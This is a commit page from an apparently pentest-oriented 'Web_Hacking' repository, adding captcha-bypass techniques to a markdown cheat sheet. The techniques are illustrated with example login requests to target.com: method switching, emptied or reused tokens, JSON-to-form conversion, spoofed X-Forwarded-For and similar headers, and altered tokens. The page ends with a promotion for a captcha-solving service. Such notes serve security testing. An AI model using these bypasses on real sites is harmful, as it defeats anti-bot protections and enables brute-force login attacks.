vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Captcha Bypass.md

Browse Source
This commit is contained in:
Mehdi 2023-12-07 10:26:41 +03:30 committed by GitHub
parent 9cbbc9686d
commit c106161289
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 78 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
Captcha Bypass.md
View File

@ -11,6 +11,84 @@
* If the captcha consists of read characters from an image, check manually or with code how many images are being used and if only a few images are being used, detect them by MD5 * If the captcha consists of read characters from an image, check manually or with code how many images are being used and if only a few images are being used, detect them by MD5
* Use an OCR (https://github.com/tesseract-ocr/tesseract) * Use an OCR (https://github.com/tesseract-ocr/tesseract)
## Different ways to bypass captcha:
1. Try **changing request method**, for example `POST` to `GET`
```html
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=user&_Password=test123
```
Change the method to `GET`:
```html
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=user&_Password=test123 HTTP 1.1
Host: target.com
[...]
```
2. Try to **remove the value** of CAPTCHA parameter
```html
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=user&_Password=test123
```
Remove the parameter:
```html
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=&_Username=user&_Password=test123
```
3. Try **reuse Old CAPTCHA** Token
```html
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=user&_Password=test123
```
4. Convert **JSON data** to **normal request** parameter
```html
POST / HTTP 1.1
Host: target.com
[...]
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"user","_Password":"test123"}
```
Convert to normal request:
```html
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=user&_Password=test123
```
5. Try **custom header** to bypass CAPTCHA
* `X-Originating-IP: 127.0.0.1`
* `X-Forwarded-For: 127.0.0.1`
* `X-Remote-IP: 127.0.0.1`
* `X-Remote-Addr: 127.0.0.1`
6. **Change some specific characters** of the captcha parameter and see if it is possible to bypass the CAPTCHA.
```html
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=user&_Password=test123
```
Try this to bypass:
```html
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=user&_Password=test123
```
## Online Services to bypass captchas ## Online Services to bypass captchas
* [Capsolver](https://www.capsolver.com/) automatic captcha solver offers the most affordable and quick captcha-solving solution. You may rapidly combine it with your program using its simple integration option to achieve the best results in a matter of seconds. * [Capsolver](https://www.capsolver.com/) automatic captcha solver offers the most affordable and quick captcha-solving solution. You may rapidly combine it with your program using its simple integration option to achieve the best results in a matter of seconds.